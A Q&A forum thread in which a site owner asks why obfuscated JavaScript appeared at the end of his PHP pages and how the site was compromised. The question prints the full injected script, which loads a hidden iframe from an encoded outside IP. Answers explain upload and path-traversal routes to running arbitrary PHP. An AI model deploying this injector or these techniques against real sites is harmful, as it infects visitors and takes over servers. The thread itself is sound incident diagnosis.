PHP script: malicious JavaScript code at the end

Question

The problem:

On my webspace there are PHP files which all end with this:

<?php include 'footer.php'; ?>

Before this line, there is also HTML code in the files.

The output in the browser ends with this, of course:

</body>
</html>

But yesterday, there was some malicious code at the end, suddenly. The output of my index.php was:

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

I opened the file on my webspace (downloaded via FTP) and I saw that someone had put this code right into the file!

How could this happen?

The only ways I can imagine:

• Somebody got my FTP password. But he wouldn't only have put it into one file. He could have done much more damage. So I can't imagine this is the case.
• I have a virus on my PC myself. I use Notepad++ for editing and FileZilla for uploading. Maybe these programs were contaminated as well and I uploaded the malicious code - without knowing.
• Someone used a security hole (XSS) to put that code into the page. But he couldn't have put it right into the file, could he?

Symptoms:

Users reported a blue panel popping up in Firefox. It asked them to install a plugin. Now some of them have Exploit.Java.CVE-2010-0886.a on their PC.

Is this due to the malicious code? What did the code do exactly?

Can you help me?

Please help me, I'm really desperate.

Maybe one additional question, if you know how I could have got it: How could I prevent something like this in the future?

Edit #1:

I've found a file called "x76x09.php" in the root directory of my webspace. It has a filesize of 44.281 bytes. I've downloaded it and tried to open it. But my antivirus software said it's a trojan (Trojan.Script.224490). I think this file has been executed and added the malicious code to the "index.php" in every directory. Does this help? How could the trojan come to my webspace? Is this a well-known virus?

Edit #2:

My hoster says he can now be sure that the file wasn't uploaded via FTP. So the infection didn't happen via FTP. According to my hoster, it must be insecure scripts.

Edit #3:

Security holes according to PHPSecInfo:

• allow_url_fopen = 1
• allow_url_include = 1
• expose_php = 1
• file_uploads = 1 (is this to blame for the malicious "x76x09.php" file?)
• group_id = 99
• user_id = 99

Edit #4:

I've analyzed the file which had been executed on my webserver. Here's the results.

So this virus seems to be known as:

• PHP/C99Shell.BF
• Backdoor/PHP.C99Shell
• BackDoor.Generic_c.CQA
• Trojan.Script.224490
• Exploit.PHP.635
• Backdoor.PHP.C99Shell.bf
• Trojan.Script.224490

Could some of them cause the malicious file on my webspace which added the malicious code?

Answer 1

I don't think that the problem is that you are using a shared host because I have found six others (degmsb, Benvolio, joomla01, DJ-Alien, valerione1979, and Kars) whose websites had the same script added. Also, it is doubtful that any of your files would be writable by others because files that are uploaded over FTP are subject to the file creation mode bits mask.

My best guess is that someone is cracking websites using either known exploits or exploits against common weaknesses, and that this person is identifying likely targets with Google hacking. degmsb's Wordpress website and Benvolio's Burning Board Lite website were likely cracked via known exploits (possibly known exploits of plugins to these software bases such as TinyMCE), and your website, since you wrote it yourself, was likely cracked via an exploit against a common website weakness.

Given that you allow file uploads (one of your PHP scripts accepts & saves files that are uploaded by your users), I would consider CWE-434: Unrestricted Upload of File with Dangerous Type. A CWE-434 exploit works like this: suppose you allow users to upload avatar images or pictures. The script to which uploaded images are POSTed might save the file to /images using the same filename that the user supplied. Now imagine that someone uploads x76x09.gif.php (or x76x09.gif.asp, x76x09.gif.php4, etc.). Your script will dutifully save this upload to /images/x76x09.gif.php and all that the cracker needs to do to have the server run this script is browse to /images/x76x09.gif.php. Even if the file is named x76x09.php.gif, some web servers will execute the file.

Another possibility is that the filename of the upload that PHP receives, $_FILES['upload']['name'], which is the filename value in the Content-Disposition header that is sent, was constructed to something like ..\modules\x.gif. If your script saved the newly-uploaded file to str_replace('\\', '/', '/images/' . basename($_FILES['upload']['name'])), or /images/../modules/x.gif on a non-Windows host (http://codepad.org/t83dYZwa), and there was some way for the user to cause one of your PHP scripts to include or require any script in the modules directory (say index.php?module=x.gif&action=blah), then the cracker would be able to execute arbitrary PHP.

EDIT: It looks like x76x09.php is some sort of unrestricted directory browser and file uploader. If a user manages to get this uploaded to your server, then they can basically do anything that you can do with your FTP access. Delete it.

EDIT2: Look for copies of this PHP source (the part gzuncompress(base64_decode("HJ3H...geFb//eeff/79z/8A"));). Remove it from all of your PHP scripts.

EDIT3: Googling parts of the PHP script, I have found several webpages where this source is listed verbatim, and all of these pages have something to do with file uploading functionality for the respective websites. It therefore seems very likely that the hacker of your website used a CWE-434 exploit.

Answer 2

Looks like your server has been compromised, also are you on shared host?

You can find out security configuration of your server with:

PhpSecInfo

_{(source: phpsec.org)}